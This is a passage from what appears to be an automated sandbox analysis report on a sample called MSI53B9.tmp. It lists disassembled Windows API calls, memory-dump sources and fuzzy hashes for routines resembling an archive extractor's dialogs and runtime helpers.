                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
                                              • Instruction ID: 8a72856d5d51f0ad19a43ab7091f52cacd97844f965cf5f44cbef676384124c8
                                              • Opcode Fuzzy Hash: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
                                              • Instruction Fuzzy Hash: CA21A17164050EEBEB447A14CC81E3B7BADFB547A8F144528FC08DA602FBA4DD414791
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0087FB07
                                              • EnterCriticalSection.KERNEL32(008B1E74,00000000,?,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?), ref: 0087FB15
                                              • new.LIBCMT ref: 0087FB35
                                              • new.LIBCMT ref: 0087FB6B
                                              • LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB8B
                                              • LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB96
                                                • Part of subcall function 0087F930: InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
                                                • Part of subcall function 0087F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
                                                • Part of subcall function 0087F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                              • String ID:
                                              • API String ID: 3919453512-0
                                              • Opcode ID: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
                                              • Instruction ID: 5baa9be47d7951dff779d9287e89621e792328fa4aa52cc2fe1cb016fb87b212
                                              • Opcode Fuzzy Hash: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
                                              • Instruction Fuzzy Hash: F1117734A002119BDB04AB69EC69B7D77A4FB45764F404239FA09D7695DB70C800DB51
                                              APIs
                                              • GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
                                              • _free.LIBCMT ref: 00896356
                                              • _free.LIBCMT ref: 0089637E
                                              • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089638B
                                              • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
                                              • _abort.LIBCMT ref: 0089639D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: e1b814437b22720af457af1c8dc091eab9cc6c085725c34e5418fd8c56ffb574
                                              • Instruction ID: 4231153b0f1e55ea74e9baa1cdbad6a35c7ef1622ed05e1cccbb6bd34aa12e47
                                              • Opcode Fuzzy Hash: e1b814437b22720af457af1c8dc091eab9cc6c085725c34e5418fd8c56ffb574
                                              • Instruction Fuzzy Hash: 2BF0A436605A00A6EF163B2C6D4AB1A2669FBC27B1B3D0114F528D2691FF398C216656
                                              APIs
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              • EndDialog.USER32(?,00000001), ref: 0088B86B
                                              • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0088B881
                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088B89B
                                              • SetDlgItemTextW.USER32(?,00000066), ref: 0088B8A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogWindow
                                              • String ID: RENAMEDLG
                                              • API String ID: 445417207-3299779563
                                              • Opcode ID: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
                                              • Instruction ID: 8ff6cd5ffb5f2e25ea4c1d50d69bcc353cb76092e2e88a85ff45f0fae7812530
                                              • Opcode Fuzzy Hash: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
                                              • Instruction Fuzzy Hash: 9801B933980215BAE5156E65AE49F377B6CFBC6B81F100425F604F38A0C775A805D773
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002), ref: 00894AFF
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00894B12
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894B35
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
                                              • Instruction ID: f429bd23515e14841464a57d6a0b25367141f912ce5b91d0af438f789dd55b56
                                              • Opcode Fuzzy Hash: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
                                              • Instruction Fuzzy Hash: 31F08C30A00208BBEB15AFA4DC19FAEBFB8FB09721F000064B805E2660DB748940CB80
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
                                              • Instruction ID: 8747fe84c396113f34d7fa9d63078b4d57acc0dc132bae7646f3044a519195a3
                                              • Opcode Fuzzy Hash: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
                                              • Instruction Fuzzy Hash: 2641ED32A00604AFDF15EF78C890A6AB7E1FF86314F2945A9E505EB381DB71AD01CB81
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 008989B8
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008989DB
                                                • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00898A01
                                              • _free.LIBCMT ref: 00898A14
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00898A23
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 8ca4591ba8154d3614afc149c8d1917f04c2c6936323f54ac27d4c300e097ba9
                                              • Instruction ID: 3fe08374357eefe77364f0a78479071b9851bd9f9308e2fa7b0334ae04ba0aa2
                                              • Opcode Fuzzy Hash: 8ca4591ba8154d3614afc149c8d1917f04c2c6936323f54ac27d4c300e097ba9
                                              • Instruction Fuzzy Hash: C8017572701626BB2B2176AA6C8CC7B7DADFAC7B61318011AB904D3101DE648C0185B2
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00895E43,00895ADF,?,0089634D,00000001,00000364,?,00892213,?,?,008ACBE8), ref: 008963A8
                                              • _free.LIBCMT ref: 008963DD
                                              • _free.LIBCMT ref: 00896404
                                              • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896411
                                              • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089641A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: d640150bcfd1aaf0cfc0acd23c60b97179c3fbadc12c3968a885e32628d20f34
                                              • Instruction ID: 833cf5278cdcb544681732b4c76651db46177a65da2a34cfdc11d0192cff94de
                                              • Opcode Fuzzy Hash: d640150bcfd1aaf0cfc0acd23c60b97179c3fbadc12c3968a885e32628d20f34
                                              • Instruction Fuzzy Hash: FC01D676345B0067AF063B686C89B1B2669FBD277573D4128F424D2682FF39CC215266
                                              APIs
                                              • _free.LIBCMT ref: 00899282
                                                • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                              • _free.LIBCMT ref: 00899294
                                              • _free.LIBCMT ref: 008992A6
                                              • _free.LIBCMT ref: 008992B8
                                              • _free.LIBCMT ref: 008992CA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
                                              • Instruction ID: 08c260449b32b0b42735a750d2898955bbefd3f7b350bc5702553bd2fd4a37c9
                                              • Opcode Fuzzy Hash: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
                                              • Instruction Fuzzy Hash: 61F03C32605604ABAE65FB9CF982D1A77E9FA0172075C4809F098D7D11C724FC80C651
                                              APIs
                                              • _free.LIBCMT ref: 0089555D
                                                • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                              • _free.LIBCMT ref: 0089556F
                                              • _free.LIBCMT ref: 00895582
                                              • _free.LIBCMT ref: 00895593
                                              • _free.LIBCMT ref: 008955A4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
                                              • Instruction ID: 45f85c300944d7ff5bf1b2a0c1e1cec7f3ce091ab0e1731bf96d1d9d2cf0b890
                                              • Opcode Fuzzy Hash: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
                                              • Instruction Fuzzy Hash: 60F01DB4522A548F9F067F28FC029083BB4F70572034A011AF44492B65CB394801DB83
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\MSI53B9.tmp,00000104), ref: 00894C1A
                                              • _free.LIBCMT ref: 00894CE5
                                              • _free.LIBCMT ref: 00894CEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp
                                              • API String ID: 2506810119-3310862248
                                              • Opcode ID: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
                                              • Instruction ID: 1316bae2919dd1a8ed6822006ce744df70d67ceca131a62fb7436de56269a1be
                                              • Opcode Fuzzy Hash: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
                                              • Instruction Fuzzy Hash: 5D316B71A01658AFDF21EBA99C81D9EBBFCFB85318F184066F805D7211D7718A41CB91
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00877468
                                                • Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8
                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0087752E
                                                • Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
                                                • Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
                                                • Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                              • API String ID: 3813983858-639343689
                                              • Opcode ID: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
                                              • Instruction ID: c886b5b5edfd5635dfe4a7756ce7918239ce6928a9eea0b1fa6c85c2fa6eefde
                                              • Opcode Fuzzy Hash: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
                                              • Instruction Fuzzy Hash: 8831C171904208AAEF10EF68DC06BEEBB68FF46714F048025F94DE7696D7748A44CB62
                                              APIs
                                              • CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
                                              • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CharUpper
                                              • String ID: -
                                              • API String ID: 9403516-2547889144
                                              • Opcode ID: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
                                              • Instruction ID: 63da17b40bd6cd73844a5a5dd45e54b571e971a0fdc19cac743faa1d84e3727f
                                              • Opcode Fuzzy Hash: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
                                              • Instruction Fuzzy Hash: D721A26240C20959E229BA6C8C09B7BBE98F745324F02441BF5A8D29C7E674D898D363
                                              APIs
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              • EndDialog.USER32(?,00000001), ref: 008891AB
                                              • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 008891C0
                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 008891D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogWindow
                                              • String ID: ASKNEXTVOL
                                              • API String ID: 445417207-3402441367
                                              • Opcode ID: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
                                              • Instruction ID: fa7d84ef8c74377f02ed25fe0533d432004a7577ab69cd0b5b0a2bb6ef095848
                                              • Opcode Fuzzy Hash: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
                                              • Instruction Fuzzy Hash: BC110636248206BFE605AFA8DD4EF763BADFB4A705F044010F241D74A5C33A9C05D722
                                              APIs
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              • EndDialog.USER32(?,00000001), ref: 00889694
                                              • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 008896AC
                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 008896DA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 445417207-3292211884
                                              • Opcode ID: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
                                              • Instruction ID: f21aa53f13c1cafb1ba8664b42502a1db2d6fee341fa42ad7da976551ff8f655
                                              • Opcode Fuzzy Hash: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
                                              • Instruction Fuzzy Hash: 9611E53250011876EF21EE689D49FFA376CFB1A740F140010FA89F2980D2A5AD04D7A1
                                              APIs
                                              • _swprintf.LIBCMT ref: 0087B127
                                                • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                              • _wcschr.LIBVCRUNTIME ref: 0087B145
                                              • _wcschr.LIBVCRUNTIME ref: 0087B155
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                              • String ID: %c:\
                                              • API String ID: 525462905-3142399695
                                              • Opcode ID: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
                                              • Instruction ID: 9b652876114d156d412e0e98140a0b23400fb82973b7cc2b6e4efcaf1d16b67c
                                              • Opcode Fuzzy Hash: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
                                              • Instruction Fuzzy Hash: 9E0192575043117ADA20AB699C86E6BB7ADFE963B0B94841BF84CC7085FB20D850C6B2
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983
                                              Strings
